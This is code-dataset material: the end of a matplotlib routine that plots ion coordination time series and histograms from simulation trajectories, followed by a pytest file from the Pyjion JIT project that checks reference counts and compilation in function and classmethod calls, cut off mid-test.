ion_ts_d3_both[1][traj_id][ion_id][::data_skip] ion_ts_y = ion_ts_d3_both[0][traj_id][ion_id][::data_skip] ion_ts_x_scale = [time_conv*pos for pos in ion_ts_x] ion_ts_y_flip = [1*pos for pos in ion_ts_y] ax19.plot(ion_ts_x_scale, ion_ts_y_flip) # Plot 20 - Coordination Histogram left = 0 for color_id, hist_data in enumerate(zip(ion_histo_d3_both[0][traj_id], ion_histo_d3_both[1][traj_id])): vals_scaled = array([val*hist_scale for val in hist_data[0]]) labels_scaled = array(hist_data[1][1:])-1 ax20.barh(labels_scaled, vals_scaled, align='center', color=colors[color_id], left=left) left += vals_scaled # Plot 15 - L Coordination Timeseries Per Atom for ion_id in sorted(ion_ts_both[0][traj_id].keys(), reverse=False): mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] ion_ts_x = ion_ts_l_1st[1][traj_id][ion_id][::data_skip] ion_ts_y = ion_ts_l_1st[0][traj_id][ion_id][::data_skip] ion_ts_x_scale = [time_conv*pos for pos in ion_ts_x] ion_ts_y_flip = [1*pos for pos in ion_ts_y] ax21.plot(ion_ts_x_scale, ion_ts_y_flip) # Plot 16 - Coordination Histogram left = 0 for color_id, hist_data in enumerate(zip(ion_histo_l_1st[0][traj_id], ion_histo_l_1st[1][traj_id])): vals_scaled = array([val*hist_scale for val in hist_data[0]]) labels_scaled = array(hist_data[1][1:])-1 ax22.barh(labels_scaled, vals_scaled, align='center', color=colors[color_id], left=left) left += vals_scaled # Plot 17 - L Coordination Timeseries Per Atom for ion_id in sorted(ion_ts_both[0][traj_id].keys(), reverse=False): mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] ion_ts_x = ion_ts_l_2nd[1][traj_id][ion_id][::data_skip] ion_ts_y = ion_ts_l_2nd[0][traj_id][ion_id][::data_skip] ion_ts_x_scale = [time_conv*pos for pos in ion_ts_x] ion_ts_y_flip = [1*pos for pos in ion_ts_y] ax23.plot(ion_ts_x_scale, ion_ts_y_flip) # Plot 24 - Coordination Histogram left = 0 for color_id, hist_data in enumerate(zip(ion_histo_l_2nd[0][traj_id], ion_histo_l_2nd[1][traj_id])): vals_scaled = array([val*hist_scale for val in hist_data[0]]) labels_scaled = array(hist_data[1][1:])-1 ax24.barh(labels_scaled, vals_scaled, align='center', color=colors[color_id], left=left) left += vals_scaled # Plot 25 - L Coordination Timeseries Per Atom for ion_id in sorted(ion_ts_both[0][traj_id].keys(), reverse=False): mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] ion_ts_x = ion_ts_l_both[1][traj_id][ion_id][::data_skip] ion_ts_y = ion_ts_l_both[0][traj_id][ion_id][::data_skip] ion_ts_x_scale = [time_conv*pos for pos in ion_ts_x] ion_ts_y_flip = [1*pos for pos in ion_ts_y] ax25.plot(ion_ts_x_scale, ion_ts_y_flip) # Plot 26 - Coordination Histogram left = 0 for color_id, hist_data in enumerate(zip(ion_histo_l_both[0][traj_id], ion_histo_l_both[1][traj_id])): vals_scaled = array([val*hist_scale for val in hist_data[0]]) labels_scaled = array(hist_data[1][1:])-1 ax26.barh(labels_scaled, vals_scaled, align='center', color=colors[color_id], left=left) left += vals_scaled ax1.set_ylabel("Axial pos / nm") #ax1.set_ylim([-0.5, 1.2]) #ax1.set_yticks([x/10.0 for x in range(-4,11,4)]) ax1.set_ylim([-0.8, 1.2]) ax1.set_yticks([x/10.0 for x in range(-9,11,4)]) ax1.set_xlim([-5,max_length+5]) ax1.set_xticks(range(0, int(50*round(max_length/50)), 50)) ax1.yaxis.set_major_locator(MultipleLocator(0.2)) ax1.yaxis.set_minor_locator(MultipleLocator(0.1)) ax1.xaxis.set_major_locator(MultipleLocator(50)) ax1.xaxis.set_minor_locator(MultipleLocator(25)) ax1.set_axisbelow(True) ax1.yaxis.grid(True,'minor') ax1.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax1.xaxis.grid(True,'minor') ax1.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax2.grid(True) ax2.set_xlim([0,1.0]) ax2.set_xticks([x/10.0 for x in range(0,11,2)]) ax3.set_ylabel("1st") ax3.set_yticks(range(0,max_coord+1,2)) ax3.set_ylim([-0.5,max_coord+0.5]) ax3.yaxis.set_major_locator(MultipleLocator(2)) ax3.yaxis.set_minor_locator(MultipleLocator(1)) ax3.xaxis.set_major_locator(MultipleLocator(50)) ax3.xaxis.set_minor_locator(MultipleLocator(25)) ax3.set_axisbelow(True) ax3.yaxis.grid(True,'minor') ax3.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax3.xaxis.grid(True,'minor') ax3.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax4.grid(True) ax5.set_yticks(range(0,max_coord+1,2)) ax5.set_ylim([-0.5,max_coord+0.5]) ax5.yaxis.set_major_locator(MultipleLocator(2)) ax5.yaxis.set_minor_locator(MultipleLocator(1)) ax5.xaxis.set_major_locator(MultipleLocator(50)) ax5.xaxis.set_minor_locator(MultipleLocator(25)) ax5.set_axisbelow(True) ax5.yaxis.grid(True,'minor') ax5.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax5.xaxis.grid(True,'minor') ax5.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax5.set_ylabel("181\n2nd") ax6.grid(True) ax7.set_yticks(range(0,max_coord+1,2)) ax7.set_ylim([-0.5,max_coord+0.5]) ax7.yaxis.set_major_locator(MultipleLocator(2)) ax7.yaxis.set_minor_locator(MultipleLocator(1)) ax7.xaxis.set_major_locator(MultipleLocator(50)) ax7.xaxis.set_minor_locator(MultipleLocator(25)) ax7.set_axisbelow(True) ax7.yaxis.grid(True,'minor') ax7.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax7.xaxis.grid(True,'minor') ax7.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax7.set_ylabel("Bth") ax8.grid(True) ax9.set_yticks(range(0,max_coord+1,2)) ax9.set_ylim([-0.5,max_coord+0.5]) ax9.yaxis.set_major_locator(MultipleLocator(2)) ax9.yaxis.set_minor_locator(MultipleLocator(1)) ax9.xaxis.set_major_locator(MultipleLocator(50)) ax9.xaxis.set_minor_locator(MultipleLocator(25)) ax9.set_axisbelow(True) ax9.yaxis.grid(True,'minor') ax9.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax9.xaxis.grid(True,'minor') ax9.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax9.set_ylabel("1st") ax10.grid(True) ax11.set_yticks(range(0,max_coord+1,2)) ax11.set_ylim([-0.5,max_coord+0.5]) ax11.yaxis.set_major_locator(MultipleLocator(2)) ax11.yaxis.set_minor_locator(MultipleLocator(1)) ax11.xaxis.set_major_locator(MultipleLocator(50)) ax11.xaxis.set_minor_locator(MultipleLocator(25)) ax11.set_axisbelow(True) ax11.yaxis.grid(True,'minor') ax11.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax11.xaxis.grid(True,'minor') ax11.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax11.set_ylabel("178\n2nd") ax12.grid(True) ax13.set_yticks(range(0,max_coord+1,2)) ax13.set_ylim([-0.5,max_coord+0.5]) ax13.yaxis.set_major_locator(MultipleLocator(2)) ax13.yaxis.set_minor_locator(MultipleLocator(1)) ax13.xaxis.set_major_locator(MultipleLocator(50)) ax13.xaxis.set_minor_locator(MultipleLocator(25)) ax13.set_axisbelow(True) ax13.yaxis.grid(True,'minor') ax13.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax13.xaxis.grid(True,'minor') ax13.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax13.set_ylabel("Bth") ax14.grid(True) ax15.set_yticks(range(0,max_coord+1,2)) ax15.set_ylim([-0.5,max_coord+0.5]) ax15.set_ylabel("1st") ax15.yaxis.set_major_locator(MultipleLocator(2)) ax15.yaxis.set_minor_locator(MultipleLocator(1)) ax15.xaxis.set_major_locator(MultipleLocator(50)) ax15.xaxis.set_minor_locator(MultipleLocator(25)) ax15.set_axisbelow(True) ax15.yaxis.grid(True,'minor') ax15.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax15.xaxis.grid(True,'minor') ax15.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax16.grid(True) ax17.set_yticks(range(0,max_coord+1,2)) ax17.set_ylim([-0.5,max_coord+0.5]) ax17.set_ylabel("177\n2nd") ax17.yaxis.set_major_locator(MultipleLocator(2)) ax17.yaxis.set_minor_locator(MultipleLocator(1)) ax17.xaxis.set_major_locator(MultipleLocator(50)) ax17.xaxis.set_minor_locator(MultipleLocator(25)) ax17.set_axisbelow(True) ax17.yaxis.grid(True,'minor') ax17.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax17.xaxis.grid(True,'minor') ax17.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax18.grid(True) ax19.set_yticks(range(0,max_coord+1,2)) ax19.set_ylim([-0.5,max_coord+0.5]) ax19.set_ylabel("Bth") ax19.yaxis.set_major_locator(MultipleLocator(2)) ax19.yaxis.set_minor_locator(MultipleLocator(1)) ax19.xaxis.set_major_locator(MultipleLocator(50)) ax19.xaxis.set_minor_locator(MultipleLocator(25)) ax19.set_axisbelow(True) ax19.yaxis.grid(True,'minor') ax19.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax19.xaxis.grid(True,'minor') ax19.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax20.grid(True) ax21.set_yticks(range(0,max_coord+1,2)) ax21.set_ylim([-0.5,max_coord+0.5]) ax21.set_ylabel("1st") ax21.yaxis.set_major_locator(MultipleLocator(2)) ax21.yaxis.set_minor_locator(MultipleLocator(1)) ax21.xaxis.set_major_locator(MultipleLocator(50)) ax21.xaxis.set_minor_locator(MultipleLocator(25)) ax21.set_axisbelow(True) ax21.yaxis.grid(True,'minor') ax21.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax21.xaxis.grid(True,'minor') ax21.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax22.grid(True) ax23.set_yticks(range(0,max_coord+1,2)) ax23.set_ylim([-0.5,max_coord+0.5]) ax23.set_ylabel("L\n2nd") ax23.yaxis.set_major_locator(MultipleLocator(2)) ax23.yaxis.set_minor_locator(MultipleLocator(1)) ax23.xaxis.set_major_locator(MultipleLocator(50)) ax23.xaxis.set_minor_locator(MultipleLocator(25)) ax23.set_axisbelow(True) ax23.yaxis.grid(True,'minor') ax23.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax23.xaxis.grid(True,'minor') ax23.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax24.grid(True) ax25.set_yticks(range(0,max_coord+1,2)) ax25.set_ylim([-0.5,max_coord+0.5]) ax25.set_ylabel("Bth") ax25.yaxis.set_major_locator(MultipleLocator(2)) ax25.yaxis.set_minor_locator(MultipleLocator(1)) ax25.xaxis.set_major_locator(MultipleLocator(50)) ax25.xaxis.set_minor_locator(MultipleLocator(25)) ax25.set_axisbelow(True) ax25.yaxis.grid(True,'minor') ax25.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax25.xaxis.grid(True,'minor') ax25.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax25.set_xlabel("Time / ns") ax26.grid(True) ax26.xaxis.set_major_formatter(FormatStrFormatter('%.1f')) plt.subplots_adjust(hspace = 0.1, wspace = 0.02, left = 0.1, bottom = 0.08, right = 0.95, top = 0.93) plt.suptitle(plot_title+" - Traj "+str(traj_id)) if prefix != None: plt.savefig(prefix+"_"+str(traj_id)+".pdf") else: plt.show() plt.close() return True

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0.031291

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108,164

2,320

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46.622414

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null

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51747f72fe46e7bb95cb46ddf59d5937441ea1b4

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py

Python

Tests/test_functions.py

psydox/Pyjion

ddf69db27b356710ff7db3c4ba9c3e0b55de1039

[ "MIT" ]

1,137

2020-10-14T10:24:18.000Z

2022-03-31T09:37:03.000Z

Tests/test_functions.py

psydox/Pyjion

ddf69db27b356710ff7db3c4ba9c3e0b55de1039

[ "MIT" ]

310

2016-05-21T05:30:23.000Z

2022-03-21T00:59:57.000Z

Tests/test_functions.py

psydox/Pyjion

ddf69db27b356710ff7db3c4ba9c3e0b55de1039

[ "MIT" ]

55

2016-05-20T06:11:28.000Z

2022-03-15T12:48:00.000Z

import sys import pyjion import math import time import pytest class TestScopeLeaks: def test_slice(self): a = "12345" def x(a): a = a[1:] before = sys.getrefcount(a) x(a) assert before == sys.getrefcount(a) def test_inplace_operator(self): a = "12345" def x(a): a += a before = sys.getrefcount(a) x(a) assert before == sys.getrefcount(a) class TestFunctionCalls: def test_arg0(self): def arg0() -> int: a = 1 b = 2 c = 3 d = 4 return a + b + c + d assert sys.getrefcount(arg0) == 2 assert arg0() == 10 assert sys.getrefcount(arg0) == 2 info = pyjion.info(arg0) assert info.compiled, info.compile_result def test_arg0_cfunction(self): target = time.time pre_ref_cnt = sys.getrefcount(target) assert target() is not None assert sys.getrefcount(target) == pre_ref_cnt info = pyjion.info(self.test_arg0_cfunction.__code__) assert info.compiled, info.compile_result def test_arg0_exc(self): def arg0() -> int: raise ValueError assert sys.getrefcount(arg0) == 2 pytest.raises(ValueError, arg0) assert sys.getrefcount(arg0) == 2 info = pyjion.info(arg0) assert info.compiled, info.compile_result def test_arg0_cfunction_exc(self): target = math.sqrt pre_ref_cnt = sys.getrefcount(target) pytest.raises(TypeError, target) assert sys.getrefcount(target) == pre_ref_cnt info = pyjion.info(self.test_arg0_cfunction_exc.__code__) assert info.compiled, info.compile_result def test_arg1(self): def arg1(e): a = '1' b = '2' c = '3' d = '4' return a + b + c + d + e a = '5' pre_ref = sys.getrefcount(a) assert sys.getrefcount(arg1) == 2 assert arg1(a) == '12345' assert sys.getrefcount(arg1) == 2 assert sys.getrefcount(a) == pre_ref info = pyjion.info(arg1) assert info.compiled, info.compile_result def test_arg1_cfunction(self): target = math.sqrt four = 1024 pre_ref_cnt = sys.getrefcount(target) arg1_pre_ref_cnt = sys.getrefcount(four) assert target(four) == 32.0 assert sys.getrefcount(target) == pre_ref_cnt assert sys.getrefcount(four) == arg1_pre_ref_cnt info = pyjion.info(self.test_arg1_cfunction.__code__) assert info.compiled, info.compile_result def test_arg1_exc(self): def arg1(e): raise ValueError a = '5' pre_ref = sys.getrefcount(a) assert sys.getrefcount(arg1) == 2 pytest.raises(ValueError, arg1, a) assert sys.getrefcount(arg1) == 2 assert sys.getrefcount(a) == pre_ref info = pyjion.info(arg1) assert info.compiled, info.compile_result def test_arg1_cfunction_exc(self): target = math.sqrt four = 'four' pre_ref_cnt = sys.getrefcount(target) arg1_pre_ref_cnt = sys.getrefcount(four) pytest.raises(TypeError, target, four) assert sys.getrefcount(target) == pre_ref_cnt assert sys.getrefcount(four) == arg1_pre_ref_cnt info = pyjion.info(self.test_arg1_cfunction_exc.__code__) assert info.compiled, info.compile_result def test_arg2(self): def arg2(e, f): a = '1' b = '2' c = '3' d = '4' return a + b + c + d + e + f a = '5' b = '6' pre_ref_a = sys.getrefcount(a) pre_ref_b = sys.getrefcount(b) assert sys.getrefcount(arg2) == 2 assert arg2(a, b) == '123456' assert sys.getrefcount(arg2) == 2 assert sys.getrefcount(a) == pre_ref_a assert sys.getrefcount(b) == pre_ref_b info = pyjion.info(arg2) assert info.compiled, info.compile_result def test_arg3(self): def arg3(e, f, g): a = '1' b = '2' c = '3' d = '4' return a + b + c + d + e + f + g assert arg3('5', '6', '7') == '1234567' info = pyjion.info(arg3) assert info.compiled, info.compile_result def test_arg4(self): def arg4(e, f, g, h): a = 1 b = 2 c = 3 d = 4 return a + b + c + d + e + f + g + h assert arg4(5, 6, 7, 8) == 36 info = pyjion.info(arg4) assert info.compiled, info.compile_result def test_arg5(self): def arg5(e, f, g, h, i): a = 1 b = 2 c = 3 d = 4 return a + b + c + d + e + f + g + h + i assert arg5(5, 6, 7, 8, 9) == 45 info = pyjion.info(arg5) assert info.compiled, info.compile_result def test_arg6(self): def arg6(e, f, g, h, i, j): a = 1 b = 2 c = 3 d = 4 return a + b + c + d + e + f + g + h + i + j assert arg6(5, 6, 7, 8, 9, 10) == 55 info = pyjion.info(arg6) assert info.compiled, info.compile_result def test_arg7(self): def arg7(e, f, g, h, i, j, k): a = 1 b = 2 c = 3 d = 4 return a + b + c + d + e + f + g + h + i + j + k assert arg7(5, 6, 7, 8, 9, 10, 11) == 66 info = pyjion.info(arg7) assert info.compiled, info.compile_result def test_arg8(self): def arg8(e, f, g, h, i, j, k, l): a = 1 b = 2 c = 3 d = 4 return a + b + c + d + e + f + g + h + i + j + k + l assert arg8(5, 6, 7, 8, 9, 10, 11, 12) == 78 info = pyjion.info(arg8) assert info.compiled, info.compile_result def test_arg9(self): def arg9(e, f, g, h, i, j, k, l, m): a = 1 b = 2 c = 3 d = 4 return a + b + c + d + e + f + g + h + i + j + k + l + m assert arg9(5, 6, 7, 8, 9, 10, 11, 12, 13) == 91 info = pyjion.info(arg9) assert info.compiled, info.compile_result def test_arg10(self): def arg10(e, f, g, h, i, j, k, l, m, n): a = 1 b = 2 c = 3 d = 4 return a + b + c + d + e + f + g + h + i + j + k + l + m + n assert arg10(5, 6, 7, 8, 9, 10, 11, 12, 13, 14) == 105 info = pyjion.info(arg10) assert info.compiled, info.compile_result def test_arg11(self): def arg11(e, f, g, h, i, j, k, l, m, n, o): a = 1 b = 2 c = 3 d = 4 return a + b + c + d + e + f + g + h + i + j + k + l + m + n + o assert arg11(5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15) == 120 info = pyjion.info(arg11) assert info.compiled, info.compile_result def test_arg15(self): def arg15(e, f, g, h, i, j, k, l, m, n, o, p, q, r, s): a = '1' b = '2' c = '3' d = '4' return a + b + c + d + e + f + g + h + i + j + k + l + m + n + o a = '5' b = '6' pre_ref_a = sys.getrefcount(a) pre_ref_b = sys.getrefcount(b) assert sys.getrefcount(arg15) == 2 assert arg15(a, b, '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19') == '123456789101112131415' assert sys.getrefcount(arg15) == 2 assert sys.getrefcount(a) == pre_ref_a assert sys.getrefcount(b) == pre_ref_b info = pyjion.info(arg15) assert info.compiled, info.compile_result def test_arg15_cfunction(self): a = 500 b = 600 target = math.hypot pre_ref_target = sys.getrefcount(target) pre_ref_a = sys.getrefcount(a) pre_ref_b = sys.getrefcount(b) assert target(a, b, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19) == 782.54648424231 assert sys.getrefcount(target) == pre_ref_target assert sys.getrefcount(a) == pre_ref_a assert sys.getrefcount(b) == pre_ref_b info = pyjion.info(self.test_arg15_cfunction.__code__) assert info.compiled, info.compile_result def test_arg15_exc(self): def arg15(e, f, g, h, i, j, k, l, m, n, o, p, q, r, s): raise ValueError a = '5' b = '6' pre_ref_a = sys.getrefcount(a) pre_ref_b = sys.getrefcount(b) assert sys.getrefcount(arg15) == 2 pytest.raises(ValueError, arg15, a, b, '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19') assert sys.getrefcount(arg15) == 2 assert sys.getrefcount(a) == pre_ref_a assert sys.getrefcount(b) == pre_ref_b info = pyjion.info(arg15) assert info.compiled, info.compile_result class TestClassMethodCalls: def test_arg0(self): class F: @classmethod def arg0(cls) -> int: a = 1 b = 2 c = 3 d = 4 return a + b + c + d assert sys.getrefcount(F.arg0) == 2 assert F.arg0() == 10 assert sys.getrefcount(F.arg0) == 2 info = pyjion.info(F.arg0.__code__) assert info.compiled, info.compile_result def test_arg0_exc(self): class F: @classmethod def arg0(cls) -> int: raise ValueError assert sys.getrefcount(F.arg0) == 2 pytest.raises(ValueError, F.arg0) assert sys.getrefcount(F.arg0) == 2 info = pyjion.info(F.arg0.__code__) assert info.compiled, info.compile_result def test_arg1(self): class F: @classmethod def arg1(cls, e): a = '1' b = '2' c = '3' d = '4' return a + b + c + d + e arg_a = 'e' pre_ref_cnt = sys.getrefcount(arg_a) assert sys.getrefcount(F) == 5 assert sys.getrefcount(F.arg1) == 2 assert F.arg1(arg_a) == '1234e' assert sys.getrefcount(arg_a) == pre_ref_cnt assert sys.getrefcount(F) == 5 assert sys.getrefcount(F.arg1) == 2 info = pyjion.info(F.arg1.__code__) assert info.compiled, info.compile_result def test_arg1_cfunction(self): arg_a = 'jeremy' target = str.title arg_a_pre_ref = sys.getrefcount(arg_a) target_pre_ref = sys.getrefcount(target) target(arg_a) assert sys.getrefcount(target) == target_pre_ref assert sys.getrefcount(arg_a) == arg_a_pre_ref info = pyjion.info(self.test_arg1_cfunction.__code__) assert info.compiled, info.compile_result def test_arg1_cfunction_exc(self): arg_a = 50000 target = str.title arg_a_pre_ref = sys.getrefcount(arg_a) target_pre_ref = sys.getrefcount(target) pytest.raises(TypeError, target, arg_a,) assert sys.getrefcount(target) == target_pre_ref assert sys.getrefcount(arg_a) == arg_a_pre_ref info = pyjion.info(self.test_arg1_cfunction_exc.__code__) assert info.compiled, info.compile_result def test_arg1_exc(self): class F: @classmethod def arg1(cls, e): raise ValueError arg_a = 'e' pre_ref_cnt = sys.getrefcount(arg_a) assert sys.getrefcount(F) == 5 assert sys.getrefcount(F.arg1) == 2 pytest.raises(ValueError, F.arg1, arg_a) assert sys.getrefcount(arg_a) == pre_ref_cnt assert sys.getrefcount(F) == 5 assert sys.getrefcount(F.arg1) == 2 info = pyjion.info(F.arg1.__code__) assert info.compiled, info.compile_result def test_arg2(self): class F: @classmethod def arg2(cls, e, f): a = 1 b = 2 c = 3 d = 4 return a + b + c + d + e + f assert F.arg2(5, 6) == 21 info = pyjion.info(F.arg2.__code__) assert info.compiled, info.compile_result def test_arg3(self): class F: @classmethod def arg3(cls, e, f, g): a = 1 b = 2 c = 3 d = 4 return a + b + c + d + e + f + g assert F.arg3(5, 6, 7) == 28 info = pyjion.info(F.arg3.__code__) assert info.compiled, info.compile_result def test_arg4(self): class F: @classmethod def arg4(cls, e, f, g, h): a = 1 b = 2 c = 3 d = 4 return a + b + c + d + e + f + g + h assert F.arg4(5, 6, 7, 8) == 36 info = pyjion.info(F.arg4.__code__) assert info.compiled, info.compile_result def test_arg5(self): class F: @classmethod def arg5(cls, e, f, g, h, i): a = 1 b = 2 c = 3 d = 4 return a + b + c + d + e + f + g + h + i assert F.arg5(5, 6, 7, 8, 9) == 45 info = pyjion.info(F.arg5.__code__) assert info.compiled, info.compile_result def test_arg6(self): class F: @classmethod def arg6(cls, e, f, g, h, i, j): a = 1 b = 2 c = 3 d = 4 return a + b + c + d + e + f + g + h + i + j assert F.arg6(5, 6, 7, 8, 9, 10) == 55 info = pyjion.info(F.arg6.__code__) assert info.compiled, info.compile_result def test_arg7(self): class F: @classmethod def arg7(cls, e, f, g, h, i, j, k): a = 1 b = 2 c = 3 d = 4 return a + b + c + d + e + f + g + h + i + j + k assert F.arg7(5, 6, 7, 8, 9, 10, 11) == 66 info = pyjion.info(F.arg7.__code__) assert info.compiled, info.compile_result def test_arg8(self): class F: @classmethod def arg8(cls, e, f, g, h, i, j, k, l): a = 1 b = 2 c = 3 d = 4 return a + b + c + d + e + f + g + h + i + j + k + l assert F.arg8(5, 6, 7, 8, 9, 10, 11, 12) == 78 info = pyjion.info(F.arg8.__code__) assert info.compiled, info.compile_result def test_arg9(self): class F: @classmethod def arg9(cls, e, f, g, h, i, j, k, l, m): a = 1 b = 2 c = 3 d = 4 return a + b + c + d + e + f + g + h + i + j + k + l + m assert F.arg9(5, 6, 7, 8, 9, 10, 11, 12, 13) == 91 info = pyjion.info(F.arg9.__code__) assert info.compiled, info.compile_result def test_arg10(self): class F: @classmethod def arg10(cls, e, f, g, h, i, j, k, l, m, n): a = 1 b = 2 c = 3 d = 4 return a + b + c + d + e + f + g + h + i + j + k + l + m + n assert F.arg10(5, 6, 7, 8, 9, 10, 11, 12, 13, 14) == 105 info = pyjion.info(F.arg10.__code__) assert info.compiled, info.compile_result def test_arg11(self): class F: @classmethod def arg11(cls, e, f, g, h, i, j, k, l, m, n, o): a = 1 b = 2 c = 3 d = 4 return a + b + c + d + e + f + g + h + i + j + k + l + m + n + o assert F.arg11(5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15) == 120 info = pyjion.info(F.arg11.__code__) assert info.compiled, info.compile_result def test_arg15(self): class F: @classmethod def arg15(cls, e, f, g, h, i, j, k, l, m, n, o, p ,q ,r,s): a = 1 b = 2 c = 3 d = 4 return a + b + c + d + e + f + g + h + i + j + k + l + m + n + o + p + q + r + s a = 10000 pre_ref_cnt = sys.getrefcount(a) pre_target_cnt = sys.getrefcount(F.arg15) assert F.arg15(a, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19) == 10185 assert sys.getrefcount(a) == pre_ref_cnt assert sys.getrefcount(F.arg15) == pre_target_cnt + 1 info = pyjion.info(F.arg15.__code__) assert info.compiled, info.compile_result def test_arg15_cfunction_exc(self): target = str.strip a = ' aa ' pre_ref_cnt = sys.getrefcount(a) pre_target_cnt = sys.getrefcount(target) pytest.raises(TypeError, target, a, '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19') assert sys.getrefcount(a) == pre_ref_cnt assert sys.getrefcount(target) == pre_target_cnt info = pyjion.info(self.test_arg15_cfunction_exc.__code__) assert info.compiled, info.compile_result def test_arg15_exc(self): class F: @classmethod def arg15(cls, e, f, g, h, i, j, k, l, m, n, o, p ,q ,r,s): raise ValueError a = '1' pre_ref_cnt = sys.getrefcount(a) pre_target_cnt = sys.getrefcount(F.arg15) pytest.raises(ValueError, F.arg15, a, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19) assert sys.getrefcount(a) == pre_ref_cnt assert sys.getrefcount(F.arg15) == pre_target_cnt + 1 info = pyjion.info(F.arg15.__code__) assert info.compiled, info.compile_result class TestFunctionKwCalls: def test_arg1(self): def arg1(e): a = '1' b = '2' c = '3' d = '4' return a + b + c + d + e a = '5' pre_ref = sys.getrefcount(a) assert sys.getrefcount(arg1) == 2 assert arg1(e=a) == '12345' assert sys.getrefcount(arg1) == 2 assert sys.getrefcount(a) == pre_ref info = pyjion.info(arg1) assert info.compiled, info.compile_result def test_arg1_unpack_tuple(self): def arg1(e): a = '1' b = '2' c = '3' d = '4' return a + b + c + d + e args = ('5',) pre_ref = sys.getrefcount(args) assert sys.getrefcount(arg1) == 2 assert arg1(*args) == '12345' assert sys.getrefcount(arg1) == 2 assert sys.getrefcount(args) == pre_ref info = pyjion.info(arg1) assert info.compiled, info.compile_result def test_arg1_unpack_tuple_exc(self): def arg1(e): raise ValueError args = ('5',) pre_ref = sys.getrefcount(args) assert sys.getrefcount(arg1) == 2 pytest.raises(ValueError, arg1, *args) assert sys.getrefcount(arg1) == 2 assert sys.getrefcount(args) == pre_ref info = pyjion.info(arg1) assert info.compiled, info.compile_result def test_arg1_unpack_dict(self): def arg1(e): a = '1' b = '2' c = '3' d = '4' return a + b + c + d + e args = {'e': '5'} pre_ref = sys.getrefcount(args) assert sys.getrefcount(arg1) == 2 assert arg1(**args) == '12345' assert sys.getrefcount(arg1) == 2 assert sys.getrefcount(args) == pre_ref info = pyjion.info(arg1) assert info.compiled, info.compile_result def test_arg1_unpack_dict_exc(self): def arg1(e): raise ValueError args = {'e': '5'} pre_ref = sys.getrefcount(args) assert sys.getrefcount(arg1) == 2 pytest.raises(ValueError, arg1, **args) assert sys.getrefcount(arg1) == 2 assert sys.getrefcount(args) == pre_ref info = pyjion.info(arg1) assert info.compiled, info.compile_result def test_arg1_unpack_dict_and_tuple(self): def arg1(e, f): a = '1' b = '2' c = '3' d = '4' return a + b + c + d + e + f args = ('5',) kargs = {'f': '6'} pre_ref = sys.getrefcount(args) kpre_ref = sys.getrefcount(kargs) assert sys.getrefcount(arg1) == 2 assert arg1(*args, **kargs) == '123456' assert sys.getrefcount(arg1) == 2 assert sys.getrefcount(args) == pre_ref assert sys.getrefcount(kargs) == kpre_ref info = pyjion.info(arg1) assert info.compiled, info.compile_result def test_arg1_unpack_dict_and_tuple_exc(self): def arg1(e, f): raise ValueError args = ('5',) kargs = {'f': '6'} pre_ref = sys.getrefcount(args) kpre_ref = sys.getrefcount(kargs) assert sys.getrefcount(arg1) == 2 pytest.raises(ValueError, arg1, *args, **kargs) assert sys.getrefcount(arg1) == 2 assert sys.getrefcount(args) == pre_ref assert sys.getrefcount(kargs) == kpre_ref info = pyjion.info(arg1) assert info.compiled, info.compile_result def test_arg1_exc(self): def arg1(e): raise ValueError a = '5' pre_ref = sys.getrefcount(a) assert sys.getrefcount(arg1) == 2 pytest.raises(ValueError, arg1, e=a) assert sys.getrefcount(arg1) == 2 assert sys.getrefcount(a) == pre_ref info = pyjion.info(arg1) assert info.compiled, info.compile_result def test_arg3(self): def arg3(e, f=None, *args, **kwargs): a = '1' b = '2' c = '3' d = '4' return a + b + c + d + e + f a = '5' b = '6' c = '7' pre_ref_a = sys.getrefcount(a) pre_ref_b = sys.getrefcount(b) pre_ref_c = sys.getrefcount(c) assert sys.getrefcount(arg3) == 2 assert arg3(a, f=b, g=c) == '123456' assert sys.getrefcount(arg3) == 2 assert sys.getrefcount(a) == pre_ref_a assert sys.getrefcount(b) == pre_ref_b assert sys.getrefcount(c) == pre_ref_c info = pyjion.info(arg3) assert info.compiled, info.compile_result def test_arg3_exc(self): def arg3(e, f=None, *args, **kwargs): raise ValueError a = '5' b = '6' c = '7' pre_ref_a = sys.getrefcount(a) pre_ref_b = sys.getrefcount(b) pre_ref_c = sys.getrefcount(c) assert sys.getrefcount(arg3) == 2 pytest.raises(ValueError, arg3, a, f=b, g=c) assert sys.getrefcount(arg3) == 2 assert 